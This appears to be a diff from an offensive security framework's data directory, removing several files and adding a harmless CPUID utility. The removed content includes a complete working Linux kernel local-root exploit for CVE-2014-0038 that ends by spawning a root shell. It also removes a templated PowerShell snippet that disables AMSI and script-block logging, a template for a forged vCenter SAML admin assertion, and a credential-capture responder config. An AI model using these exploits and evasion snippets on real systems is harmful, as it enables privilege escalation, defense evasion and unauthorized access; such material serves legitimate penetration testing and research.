-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\CAAdmins</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\ComponentManager.Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.BashShellAdministrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.ReadOnly</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.SupportUsers</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\SystemConfiguration.Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\LicenseService.Administrators</saml2:AttributeValue>
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Everyone</saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="Subject Type" Name="http://vmware.com/schemas/attr-names/2011/07/isSolution" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string">false</saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="surname" Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %></saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="givenName" Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_user.encode(xml: :text) %></saml2:AttributeValue>
-            </saml2:Attribute>
-        </saml2:AttributeStatement>
-    </saml2:Assertion>
-</saml2p:Response>
@@ -1,52 +0,0 @@
-spoof_regex: .*
-ntlm_challenge: "1122334455667788"
-ntlm_domain: anonymous
-http_basic: no
-ssl_cert: null
-logfile: null
-hashdir: null
-services:
-  - type: DRDA
-    enabled: yes
-  - type: FTP
-    enabled: yes
-  - type: HTTP
-    enabled: yes
-  - type: HTTPS
-    enabled: yes
-  - type: IMAP
-    enabled: yes
-  - type: MSSQL
-    enabled: yes
-  - type: MySQL
-    enabled: yes
-  - type: POP3
-    enabled: yes
-  - type: Postgres
-    enabled: yes
-  - type: PrintJob
-    enabled: yes
-  - type: SIP
-    enabled: yes
-  - type: SMB
-    enabled: yes
-  - type: SMTP
-    enabled: yes
-  - type: Telnet
-    enabled: yes
-  - type: VNC
-    enabled: yes
-  - type: FTPS
-    enabled: yes
-  - type: IMAPS
-    enabled: yes
-  - type: POP3S
-    enabled: yes
-  - type: SMTPS
-    enabled: yes
-  - type: NBNS
-    enabled: yes
-  - type: LLMNR
-    enabled: yes
-  - type: mDNS
-    enabled: yes
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
+strip cpuinfo.ia32.bin && \
+gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
+strip cpuinfo.ia64.bin && \
+i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
+strip cpuinfo.exe
+
+ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
+
@@ -0,0 +1,64 @@
+// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
+
+/*
+#!/usr/bin/env ruby
+#    This file is part of Metasm, the Ruby assembly manipulation suite
+#    Copyright (C) 2006-2009 Yoann GUILLOT
+#
+#    Licence is LGPL, see LICENCE in the top-level directory
+
+
+#
+# this sample shows the compilation of a slightly more complex program
+# it displays in a messagebox the result of CPUID
+#
+
+*/
+
+#include <unistd.h>
+#include <stdio.h>
+
+static char *featureinfo[32] = {
+	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
+	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
+	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
+	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
+}, *extendinfo[32] = {
+	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
+	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
+	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
+	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
+};
+
+#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
+#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
+int main(void)
+{
+
+	unsigned long eax, ebx, ecx, edx;
+	unsigned long i;
+
+	cpuid(0);
+	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
+
+	cpuid(1);
+	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
+			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
+	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
+			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
+
+	fprintf(stdout, "FLAGS:");
+	for (i=0 ; i<32 ; i++)
+		if (edx & (1 << i))
+			fprintf(stdout, " %s", featureinfo[i]);
+
+	for (i=0 ; i<32 ; i++)
+		if (ecx & (1 << i))
+			fprintf(stdout, " %s", extendinfo[i]);
+
+	fprintf(stdout, "\n");
+	fflush(stdout);
+
+	return 0;
+}
+
@@ -1,174 +0,0 @@
-<?xml version="1.0" ?>
-<!--
-  This file was generated by hand since no automated analysis and generation tool currently exists for Powershell code.
-->
-<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
-  <key id="address" for="all" attr.name="address" attr.type="long"/>
-  <key id="type" for="all" attr.name="type" attr.type="string"/>
-  <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
-  <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
-  <graph edgedefault="directed">
-    <node id="block.1">
-      <data key="address">1</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">1</data>
-        <data key="type">block</data>
-        <node id="block.1:instruction.1">
-          <data key="address">1</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">If($PSVersionTable.PSVersion.Major -ge 3){</data>
-        </node>
-        <node id="block.1:instruction.2">
-          <data key="address">2</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
-        </node>
-        <node id="block.1:instruction.3">
-          <data key="address">3</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
-        </node>
-        <node id="block.1:instruction.4">
-          <data key="address">4</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    if ($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 0.3) %&gt;,'NonPublic,Static').SetValue($null,$true); };</data>
-        </node>
-        <node id="block.1:instruction.5">
-          <data key="address">5</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
-        </node>
-        <node id="block.1:instruction.6">
-          <data key="address">6</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    $GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
-        </node>
-        <node id="block.1:instruction.7">
-          <data key="address">7</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    If ($GPF) {</data>
-        </node>
-        <node id="block.1:instruction.8">
-          <data key="address">8</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
-        </node>
-        <node id="block.1:instruction.9">
-          <data key="address">9</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
-        </node>
-        <node id="block.1:instruction.10">
-          <data key="address">10</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
-        </node>
-        <node id="block.1:instruction.11">
-          <data key="address">11</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $GPC=$GPF.GetValue($null);</data>
-        </node>
-        <edge source="block.1:instruction.1" target="block.1:instruction.3"/>
-        <edge source="block.1:instruction.1" target="block.1:instruction.5"/>
-        <edge source="block.1:instruction.3" target="block.1:instruction.4"/>
-        <edge source="block.1:instruction.4" target="block.1:instruction.7"/>
-        <edge source="block.1:instruction.5" target="block.1:instruction.6"/>
-        <edge source="block.1:instruction.6" target="block.1:instruction.7"/>
-        <edge source="block.1:instruction.7" target="block.1:instruction.11"/>
-      </graph>
-    </node>
-    <node id="block.12">
-      <data key="address">12</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">12</data>
-        <data key="type">block</data>
-        <node id="block.12:instruction.12">
-          <data key="address">12</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        If($GPC[$SBL]){</data>
-        </node>
-        <node id="block.12:instruction.13">
-          <data key="address">13</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">            $GPC[$SBL][$EnableSBL]=0;</data>
-        </node>
-        <node id="block.12:instruction.14">
-          <data key="address">14</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">            $GPC[$SBL][$EnableSBIL]=0;</data>
-        </node>
-        <node id="block.12:instruction.15">
-          <data key="address">15</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        }</data>
-        </node>
-        <edge source="block.12:instruction.12" target="block.12:instruction.13"/>
-        <edge source="block.12:instruction.12" target="block.12:instruction.14"/>
-        <edge source="block.12:instruction.13" target="block.12:instruction.15"/>
-        <edge source="block.12:instruction.14" target="block.12:instruction.15"/>
-      </graph>
-    </node>
-    <node id="block.16">
-      <data key="address">16</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">16</data>
-        <data key="type">block</data>
-        <node id="block.16:instruction.16">
-          <data key="address">16</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $val.Add($EnableSBL,0);</data>
-        </node>
-        <node id="block.16:instruction.17">
-          <data key="address">17</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $val.Add($EnableSBIL,0);</data>
-        </node>
-        <node id="block.16:instruction.18">
-          <data key="address">18</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val;</data>
-        </node>
-        <edge source="block.16:instruction.16" target="block.16:instruction.18"/>
-        <edge source="block.16:instruction.17" target="block.16:instruction.18"/>
-      </graph>
-    </node>
-    <node id="block.19">
-      <data key="address">19</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">19</data>
-        <data key="type">block</data>
-        <node id="block.19:instruction.19">
-          <data key="address">19</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    } Else {</data>
-        </node>
-        <node id="block.19:instruction.20">
-          <data key="address">20</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));</data>
-        </node>
-        <node id="block.19:instruction.21">
-          <data key="address">21</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    }</data>
-        </node>
-        <node id="block.19:instruction.22">
-          <data key="address">22</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">};</data>
-        </node>
-        <edge source="block.19:instruction.19" target="block.19:instruction.20"/>
-        <edge source="block.19:instruction.20" target="block.19:instruction.21"/>
-        <edge source="block.19:instruction.21" target="block.19:instruction.22"/>
-      </graph>
-    </node>
-    <edge source="block.1" target="block.12"/>
-    <edge source="block.1" target="block.16"/>
-    <edge source="block.12" target="block.19"/>
-    <edge source="block.16" target="block.19"/>
-  </graph>
-</graphml>
@@ -1,336 +0,0 @@
-{
-  "exchange_builds": [
-    {
-      "name": "Exchange Server 4.0",
-      "builds": [
-        "4.0.996",
-        "4.0.995",
-        "4.0.994",
-        "4.0.993",
-        "4.0.838",
-        "4.0.837"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 5.0",
-      "builds": [
-        "5.0.1460",
-        "5.0.1458",
-        "5.0.1457"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 5.5",
-      "builds": [
-        "5.5.2653",
-        "5.5.2650",
-        "5.5.2448",
-        "5.5.2232",
-        "5.5.1960"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2000",
-      "builds": [
-        "6.0.6620.7",
-        "6.0.6620.5",
-        "6.0.6603",
-        "6.0.6556",
-        "6.0.6487",
-        "6.0.6249",
-        "6.0.5762",
-        "6.0.4712",
-        "6.0.4417"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2003",
-      "builds": [
-        "6.5.7654.4",
-        "6.5.7653.33",
-        "6.5.7683",
-        "6.5.7226",
-        "6.5.6944"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2007",
-      "builds": [
-        "8.3.517.0",
-        "8.3.502.0",
-        "8.3.485.1",
-        "8.3.468.0",
-        "8.3.459.0",
-        "8.3.445.0",
-        "8.3.417.1",
-        "8.3.406.0",
-        "8.3.389.2",
-        "8.3.379.2",
-        "8.3.348.2",
-        "8.3.342.4",
-        "8.3.327.1",
-        "8.3.298.3",
-        "8.3.297.2",
-        "8.3.279.6",
-        "8.3.279.5",
-        "8.3.279.3",
-        "8.3.264.0",
-        "8.3.245.2",
-        "8.3.213.1",
-        "8.3.192.1",
-        "8.3.159.2",
-        "8.3.137.3",
-        "8.3.106.2",
-        "8.3.83.6",
-        "8.2.305.3",
-        "8.2.254.0",
-        "8.2.247.2",
-        "8.2.234.1",
-        "8.2.217.3",
-        "8.2.176.2",
-        "8.1.436.0",
-        "8.1.393.1",
-        "8.1.375.2",
-        "8.1.359.2",
-        "8.1.340.1",
-        "8.1.336.1",
-        "8.1.311.3",
-        "8.1.291.2",
-        "8.1.278.2",
-        "8.1.263.1",
-        "8.1.240.6",
-        "8.0.813.0",
-        "8.0.783.2",
-        "8.0.754.0",
-        "8.0.744.0",
-        "8.0.730.1",
-        "8.0.711.2",
-        "8.0.708.3",
-        "8.0.685.25"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2010",
-      "builds": [
-        "14.3.513.0",
-        "14.3.509.0",
-        "14.3.496.0",
-        "14.3.468.0",
-        "14.3.461.1",
-        "14.3.452.0",
-        "14.3.442.0",
-        "14.3.435.0",
-        "14.3.419.0",
-        "14.3.417.1",
-        "14.3.411.0",
-        "14.3.399.2",
-        "14.3.389.1",
-        "14.3.382.0",
-        "14.3.361.1",
-        "14.3.352.0",
-        "14.3.336.0",
-        "14.3.319.2",
-        "14.3.301.0",
-        "14.3.294.0",
-        "14.3.279.2",
-        "14.3.266.2",
-        "14.3.248.2",
-        "14.3.235.1",
-        "14.3.224.2",
-        "14.3.224.1",
-        "14.3.210.2",
-        "14.3.195.1",
-        "14.3.181.6",
-        "14.3.174.1",
-        "14.3.169.1",
-        "14.3.158.1",
-        "14.3.146.0",
-        "14.3.123.4",
-        "14.2.390.3",
-        "14.2.375.0",
-        "14.2.342.3",
-        "14.2.328.10",
-        "14.3.328.5",
-        "14.2.318.4",
-        "14.2.318.2",
-        "14.2.309.2",
-        "14.2.298.4",
-        "14.2.283.3",
-        "14.2.247.5",
-        "14.1.438.0",
-        "14.1.421.3",
-        "14.1.421.2",
-        "14.1.421.0",
-        "14.1.355.2",
-        "14.1.339.1",
-        "14.1.323.6",
-        "14.1.289.7",
-        "14.1.270.1",
-        "14.1.255.2",
-        "14.1.218.15",
-        "14.0.726.0",
-        "14.0.702.1",
-        "14.0.694.0",
-        "14.0.689.0",
-        "14.0.682.1",
-        "14.0.639.21"
-      ],
-      "eol": true
-    },
-    {
-      "name": "Exchange Server 2013",
-      "builds": [
-        "15.0.1497.40",
-        "15.0.1497.36",
-        "15.0.1497.33",
-        "15.0.1497.28",
-        "15.0.1497.26",
-        "15.0.1497.24",
-        "15.0.1497.23",
-        "15.0.1497.18",
-        "15.0.1497.15",
-        "15.0.1497.12",
-        "15.0.1497.2",
-        "15.0.1473.6",
-        "15.0.1473.3",
-        "15.0.1395.12",
-        "15.0.1395.4",
-        "15.0.1367.3",
-        "15.0.1365.1",
-        "15.0.1347.2",
-        "15.0.1320.4",
-        "15.0.1293.2",
-        "15.0.1263.5",
-        "15.0.1236.3",
-        "15.0.1210.3",
-        "15.0.1178.4",
-        "15.0.1156.6",
-        "15.0.1130.7",
-        "15.0.1104.5",
-        "15.0.1076.9",
-        "15.0.1044.25",
-        "15.0.995.29",
-        "15.0.913.22",
-        "15.0.847.64",
-        "15.0.847.32",
-        "15.0.775.38",
-        "15.0.712.24",
-        "15.0.620.29",
-        "15.0.516.32"
-      ],
-      "eol": false
-    },
-    {
-      "name": "Exchange Server 2016",
-      "builds": [
-        "15.1.2507.12",
-        "15.1.2507.9",
-        "15.1.2507.6",
-        "15.1.2375.31",
-        "15.1.2375.28",
-        "15.1.2375.24",
-        "15.1.2375.18",
-        "15.1.2375.17",
-        "15.1.2375.12",
-        "15.1.2375.7",
-        "15.1.2308.21",
-        "15.1.2308.20",
-        "15.1.2308.15",
-        "15.1.2308.14",
-        "15.1.2308.8",
-        "15.1.2242.12",
-        "15.1.2242.10",
-        "15.1.2242.8",
-        "15.1.2242.4",
-        "15.1.2176.14",
-        "15.1.2176.12",
-        "15.1.2176.9",
-        "15.1.2176.2",
-        "15.1.2106.13",
-        "15.1.2106.2",
-        "15.1.2044.13",
-        "15.1.2044.4",
-        "15.1.1979.8",
-        "15.1.1979.3",
-        "15.1.1913.12",
-        "15.1.1913.5",
-        "15.1.1847.12",
-        "15.1.1847.3",
-        "15.1.1779.8",
-        "15.1.1779.2",
-        "15.1.1713.10",
-        "15.1.1713.5",
-        "15.1.1591.18",
-        "15.1.1591.10",
-        "15.1.1531.12",
-        "15.1.1531.3",
-        "15.1.1466.16",
-        "15.1.1466.3",
-        "15.1.1415.10",
-        "15.1.1415.2",
-        "15.1.1261.35",
-        "15.1.1034.26",
-        "15.1.845.34",
-        "15.1.669.32",
-        "15.1.544.27",
-        "15.1.466.34",
-        "15.1.396.30",
-        "15.1.225.42",
-        "15.1.225.16"
-      ],
-      "eol": false
-    },
-    {
-      "name": "Exchange Server 2019",
-      "builds": [
-        "15.2.1118.12",
-        "15.2.1118.9",
-        "15.2.1118.7",
-        "15.2.986.29",
-        "15.2.986.26",
-        "15.2.986.22",
-        "15.2.986.15",
-        "15.2.986.14",
-        "15.2.986.9",
-        "15.2.986.5",
-        "15.2.922.20",
-        "15.2.922.19",
-        "15.2.922.14",
-        "15.2.922.13",
-        "15.2.922.7",
-        "15.2.858.15",
-        "15.2.858.12",
-        "15.2.858.10",
-        "15.2.858.5",
-        "15.2.792.15",
-        "15.2.792.13",
-        "15.2.792.10",
-        "15.2.792.3",
-        "15.2.721.13",
-        "15.2.721.2",
-        "15.2.659.12",
-        "15.2.659.4",
-        "15.2.595.8",
-        "15.2.595.3",
-        "15.2.529.13",
-        "15.2.529.5",
-        "15.2.464.15",
-        "15.2.464.5",
-        "15.2.397.11",
-        "15.2.397.3",
-        "15.2.330.11",
-        "15.2.330.5",
-        "15.2.221.18",
-        "15.2.221.12",
-        "15.2.196.0"
-      ],
-      "eol": false
-    }
-  ]
-}
@@ -1,55 +0,0 @@
-%PDF-1.0
-1 0 obj
-<<
-	/Pages 2 0 R
-	/Type /Catalog
->>
-endobj
-2 0 obj
-<<
-	/Count 1
-	/Kids [ 3 0 R ]
-	/Type /Pages
->>
-endobj
-3 0 obj
-<<
-	/Contents 4 0 R
-	/Parent 2 0 R
-	/Resources <<
-		/Font <<
-			/F1 <<
-				/Type /Font
-				/Subtype /Type1
-				/BaseFont /Helvetica
-				/Name /F1
-			>>
-		>>
-	>>
-	/Type /Page
-	/MediaBox [ 0 0 795 842 ]
->>
-endobj
-4 0 obj
-<<
-	/Length 0
->>stream
-
-endstream
-endobj
-xref
-0 5
-0000000000 65535 f
-0000000010 00000 n
-0000000067 00000 n
-0000000136 00000 n
-0000000373 00000 n
-trailer
-<<
-	/Root 1 0 R
-	/Size 5
-	/Info 0 0 R
->>
-startxref
-429
-%%EOF
@@ -1,226 +0,0 @@
-/* 
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
-recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
-CVE-2014-0038 / x32 ABI with recvmmsg
-by rebel @ irc.smashthestack.org
-----------------------------------
-
-takes about 13 minutes to run because timeout->tv_sec is decremented
-once per second and 0xff*3 is 765.
-
-some things you could do while waiting:
-  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
-  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
-  * brew some coffee
-  * stare at the countdown giggly with anticipation
-
-could probably whack the high bits of some pointer with nanoseconds,
-but that would require a bunch of nulls before the pointer and then
-reading an oops from dmesg which isn't that elegant.
-
-&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
-
-hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
-anyway..
-
-same principle will work on 32bit but I didn't really find any major
-distros shipping with CONFIG_X86_X32=y
-
-user@ubuntu:~$ uname -a
-Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
-user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
-user@ubuntu:~$ ./recvmmsg
-byte 3 / 3.. ~0 secs left.     
-w00p w00p!
-# id
-uid=0(root) gid=0(root) groups=0(root)
-# sh phalanx-2.6b-x86_64.sh
-unpacking..
-
-:)=
-
-greets to my homeboys kaliman, beist, capsl & all of #social
-
-Sat Feb  1 22:15:19 CET 2014
-% rebel %
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
-*/
-
-#define _GNU_SOURCE
-#include <netinet/ip.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <unistd.h>
-#include <sys/syscall.h>
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <sys/utsname.h>
-
-#define __X32_SYSCALL_BIT 0x40000000
-#undef __NR_recvmmsg
-#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
-#define VLEN 1
-#define BUFSIZE 200
-
-int port;
-
-struct offset {
-    char *kernel_version;
-    unsigned long dest; // net_sysctl_root + 96
-    unsigned long original_value; // net_ctl_permissions
-    unsigned long prepare_kernel_cred;
-    unsigned long commit_creds;
-};
-
-struct offset offsets[] = {
-    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
-    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
-    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
-    {NULL,0,0,0,0}
-};
-
-void udp(int b) {
-    int sockfd;
-    struct sockaddr_in servaddr,cliaddr;
-    int s = 0xff+1;
-
-    if(fork() == 0) {
-        while(s > 0) {
-            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
-            sleep(1);
-            s--;
-            fprintf(stderr,".");
-        }
-
-        sockfd = socket(AF_INET,SOCK_DGRAM,0);
-        bzero(&servaddr,sizeof(servaddr));
-        servaddr.sin_family = AF_INET;
-        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
-        servaddr.sin_port=htons(port);
-        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
-        exit(0);
-    }
-
-}
-
-void trigger() {
-    open("/proc/sys/net/core/somaxconn",O_RDONLY);
-
-    if(getuid() != 0) {
-        fprintf(stderr,"not root, ya blew it!\n");
-        exit(-1);
-    }
-
-    fprintf(stderr,"w00p w00p!\n");
-    system("/bin/sh -i");
-}
-
-typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
-typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
-_commit_creds commit_creds;
-_prepare_kernel_cred prepare_kernel_cred;
-
-// thx bliss
-static int __attribute__((regparm(3)))
-getroot(void *head, void * table)
-{
-    commit_creds(prepare_kernel_cred(0));
-    return -1;
-}
-
-void __attribute__((regparm(3)))
-trampoline()
-{
-    asm("mov $getroot, %rax; call *%rax;");
-}
-
-int main(void)
-{
-    int sockfd, retval, i;
-    struct sockaddr_in sa;
-    struct mmsghdr msgs[VLEN];
-    struct iovec iovecs[VLEN];
-    char buf[BUFSIZE];
-    long mmapped;
-    struct utsname u;
-    struct offset *off = NULL;
-
-    uname(&u);
-
-    for(i=0;offsets[i].kernel_version != NULL;i++) {
-        if(!strcmp(offsets[i].kernel_version,u.release)) {
-            off = &offsets[i];
-            break;
-        }
-    }
-
-    if(!off) {
-        fprintf(stderr,"no offsets for this kernel version..\n");
-        exit(-1);
-    }
-
-    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
-    mmapped &= 0x000000ffffffffff;
-
-        srand(time(NULL));
-    port = (rand() % 30000)+1500;
-
-    commit_creds = (_commit_creds)off->commit_creds;
-    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
-
-    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
-
-    if(mmapped == -1) {
-        perror("mmap()");
-        exit(-1);
-    }
-
-    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
-
-    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
-
-    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
-        perror("mprotect()");
-        exit(-1);
-    }
-    
-    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
-    if (sockfd == -1) {
-        perror("socket()");
-        exit(-1);
-    }
-
-    sa.sin_family = AF_INET;
-    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
-    sa.sin_port = htons(port);
-
-    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
-        perror("bind()");
-        exit(-1);
-    }
-
-    memset(msgs, 0, sizeof(msgs));
-
-    iovecs[0].iov_base = &buf;
-    iovecs[0].iov_len = BUFSIZE;
-    msgs[0].msg_hdr.msg_iov = &iovecs[0];
-    msgs[0].msg_hdr.msg_iovlen = 1;
-
-    for(i=0;i < 3 ;i++) {
-        udp(i);
-        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
-        if(!retval) {
-            fprintf(stderr,"\nrecvmmsg() failed\n");
-        }
-    }
-
-    close(sockfd); 
-
-    fprintf(stderr,"\n");
-
-    trigger();
-}
--- a/Show More
+++ b/Show More